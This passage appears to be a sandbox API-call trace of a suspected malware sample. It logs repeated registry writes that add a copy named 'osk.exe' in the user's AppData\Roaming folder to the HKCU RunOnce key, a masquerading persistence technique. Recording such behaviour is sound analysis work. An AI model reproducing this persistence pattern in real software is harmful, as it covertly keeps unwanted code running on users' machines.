ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.862] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.862] IUnknown:Release (This=0x787518) returned 0x1 [0079.862] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.863] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.863] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.863] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.863] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, 
[1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.863] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.863] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.863] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.863] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.863] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x56 [0079.863] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.863] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x57 [0079.863] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, 
wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.864] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x56 [0079.864] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.864] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.864] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.864] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.864] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.864] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.864] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.864] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.865] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.865] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.865] RegCloseKey (hKey=0x280) returned 0x0 [0079.865] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.865] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.865] SetTimer (hWnd=0x20280, nIDEvent=0x2056, uElapse=0xa, lpTimerFunc=0x0) returned 0x2056 [0079.865] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.877] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.877] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.878] KillTimer (hWnd=0x20280, uIDEvent=0x2056) returned 1 [0079.878] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.878] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, 
Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.878] IUnknown:Release (This=0x787518) returned 0x1 [0079.878] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.878] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.878] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.878] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.878] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 
0x80004002 [0079.878] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.878] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.879] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.879] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.879] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x57 [0079.879] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.879] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x58 [0079.879] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, 
pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.880] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x57 [0079.880] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.880] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.880] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.880] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.880] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.880] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.880] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.880] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, 
phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.881] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.881] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.881] RegCloseKey (hKey=0x280) returned 0x0 [0079.881] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.881] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.881] SetTimer (hWnd=0x20280, nIDEvent=0x2057, uElapse=0xa, lpTimerFunc=0x0) returned 0x2057 [0079.881] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.893] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.893] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.893] KillTimer (hWnd=0x20280, uIDEvent=0x2057) returned 1 [0079.893] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.893] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 
[0079.894] IUnknown:Release (This=0x787518) returned 0x1 [0079.894] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.894] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.894] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.894] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.894] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.894] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, 
Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.894] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.894] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.894] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.894] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x58 [0079.894] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.894] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x59 [0079.894] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), 
pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.895] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x58 [0079.895] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.895] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.895] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.895] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.896] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.896] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.896] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.896] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.896] WideCharToMultiByte (in: 
CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.896] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.896] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.896] RegCloseKey (hKey=0x280) returned 0x0 [0079.896] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.896] ISystemDebugEventFire:IsActive 